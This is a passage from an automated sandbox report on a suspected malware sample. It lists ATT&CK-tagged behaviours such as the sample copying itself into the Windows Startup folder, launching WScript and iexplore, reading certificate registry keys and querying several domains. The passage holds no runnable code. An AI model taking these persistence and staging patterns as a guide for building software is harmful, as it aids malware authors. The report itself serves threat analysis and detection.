\"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\wshext.dll (UID: 00000000-00004276)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00004276)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00004276)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll\" - [base:0; Status:c0000135]\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" - [base:0; Status:c0000135]\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"C:\\ntdll.dll\" - [base:0; Status:c0000135]\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll\" - [base:0; Status:c0000135]\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll\" - [base:0; Status:c0000135]\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll\" - [base:0; Status:c0000135]\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll\" - [base:0; Status:c0000135]\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll\" - [base:0; Status:c0000135]\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll\" - [base:0; Status:c0000135]\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\crypt32.dll\" - [base:0; Status:c0000135]\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\CRYPT32.dll\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e00844bba6a@IPHLPAPI.DLL\"\n \"0f001000dc4bba6a@IPHLPAPI.DLL\"\n \"0c000d00244cba6a@IPHLPAPI.DLL\"\n \"140015006c4cba6a@IPHLPAPI.DLL\"\n \"0c000d00e04cba6a@IPHLPAPI.DLL\"\n \"15001600c03eba6a@ADVAPI32.dll\"\n \"0e000f00703fba6a@ADVAPI32.dll\"\n \"0e000f00cc3fba6a@ADVAPI32.dll\"\n \"11001200b447ba6a@ADVAPI32.dll\"\n \"110012004848ba6a@ADVAPI32.dll\"\n \"120013008c48ba6a@ADVAPI32.dll\"\n \"12001300e448ba6a@ADVAPI32.dll\"\n \"14001500386eba6a@ADVAPI32.dll\"\n \"14001500506eba6a@ADVAPI32.dll\"\n \"14001500686eba6a@ADVAPI32.dll\"\n \"17001800806eba6a@ADVAPI32.dll\"\n \"0d000e00986eba6a@ADVAPI32.dll\"\n \"11001200a86eba6a@ADVAPI32.dll\"\n \"11001200bc6eba6a@ADVAPI32.dll\"\n \"0d000e003449ba6a@shell32.dll\"\n \"0d000e00b049ba6a@shell32.dll\"\n \"10001100c46fba6a@CRYPT32.dll\"\n \"12001300e86fba6a@CRYPT32.dll\"\n \"0f001000fc6fba6a@ADVAPI32.dll\"\n \"140015000c70ba6a@CRYPT32.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00005932)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-17", "type": 3, "relevance": 10, "name": "Accesses System Certificates Settings", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\AUTOUPDATE\"; Key: \"DISALLOWEDCERTSYNCDELTATIME\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\MY\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\2E4916B07F3DE90C8DDE2566FD9B9B400D89BBBA\"; Key: \"BLOB\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\5AEAEE3F7F2A9449CEBAFEEC68FDD184F20124A7\"; Key: \"BLOB\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\E6A3B45B062D509B3382282D196EFE97D5956CCB\"; Key: \"BLOB\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\F5AD0BCC1AD56CD150725B1C866C30AD92EF21B0\"; Key: \"BLOB\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\109F1CAED645BB78B3EA2B94C0697C740733031C\"; Key: \"BLOB\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77DC0000\n \"WScript.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77DC0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64A80000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 65230000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"archive.org\"\n \"ia600905.us.archive.org\"\n \"raw.githubusercontent.com\"\n \"vgmsite.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4\" has an executable section named \".text\"\n \"xlsrvintl.dll\" has an executable section named \".text\"\n \"DISMHOST.EXE.67AB4062.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"xlsrvintl.dll\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"DISMHOST.EXE.67AB4062.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"DISMHOST.EXE.67AB4062.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"iexplore.exe\" (UID: 00000000-00005460) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"iexplore.exe\" (UID: 00000000-00005460) was launched with modified environment variables: \"PSModulePath, Path, PATHEXT\"\n Process \"WScript.exe\" (UID: 00000000-00004276) was launched with modified environment variables: \"Path\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"iexplore.exe\" with commandline \"%APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\Yo ...\" (UID: 00000000-00005460)\n Spawned process \"iexplore.exe\" with commandline \"SCODEF:5460 CREDAT:275457 /prefetch:2\" (UID: 00000000-00005768)\n Spawned process \"WScript.exe\" with commandline \"\"%APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\A ...\" (UID: 00000000-00004276)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"iexplore.exe\" with commandline \"%APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\Yo ...\" (UID: 00000000-00005460)\n Spawned process \"iexplore.exe\" with commandline \"SCODEF:5460 CREDAT:275457 /prefetch:2\" (UID: 00000000-00005768)\n Spawned process \"WScript.exe\" with commandline \"\"%APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\A ...\" (UID: 00000000-00004276)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4\" was detected as \"temporary EXE SFX\" and name: \"sfx\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4\" was detected as \".NET\" and name: \"Library\"\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"xlsrvintl.dll\" was detected as \"temporary EXE SFX\" and name: \"sfx\"\n \"xlsrvintl.dll\" was detected as \".NET\" and name: \"Library\"\n \"xlsrvintl.dll\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"DISMHOST.EXE.67AB4062.bin\" was detected as \"temporary EXE SFX\" and name: \"sfx\"\n \"DISMHOST.EXE.67AB4062.bin\" was detected as \".NET\" and name: \"Library\"\n \"DISMHOST.EXE.67AB4062.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n \"xlsrvintl.dll\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n \"DISMHOST.EXE.67AB4062.bin\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-139", "relevance": 1, "name": "Dotnet code contains ability to modify/delete registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"SetValue\" in \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"CreateSubKey\" in \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"SetValue\" in \"xlsrvintl.dll\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"CreateSubKey\" in \"xlsrvintl.dll\"", "origin": "Static Parser", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"CopyFileW\" to copy C:\\11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe to new location %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup (UID: 00000000-00005932)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 63E20000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75640000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 75200000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\CLR_PerfMon_WrapMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"RasPbFile\"\n \"Global\\CLR_PerfMon_WrapMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_5460\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\IsoScope_1554_IE_EarlyTabStart_0x169c_Mutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\IsoScope_1554_ConnHashTable<5460>_HashTable_Mutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}\"\n \"\\Sessions\\1\\BaseNamedObjects\\IsoScope_1554_IESQMMUTEX_0_303\"\n \"\\Sessions\\1\\BaseNamedObjects\\IsoScope_1554_IESQMMUTEX_0_331\"\n \"\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}\"\n \"{5312EE61-79E3-4A24-BFE1-132B85B23C3A}\"\n \"IsoScope_1554_IE_EarlyTabStart_0x169c_Mutex\"\n \"{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\URLBLOCK_DOWNLOAD_MUTEX\"\n \"Local\\!BrowserEmulation!SharedMemory!Mutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-18", "type": 3, "relevance": 10, "name": "Accesses Software Policy Settings", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CERTIFICATES\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CRLS\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CTLS\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\"; Key: \"\")\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CERTIFICATES\"; Key: \"\")\n 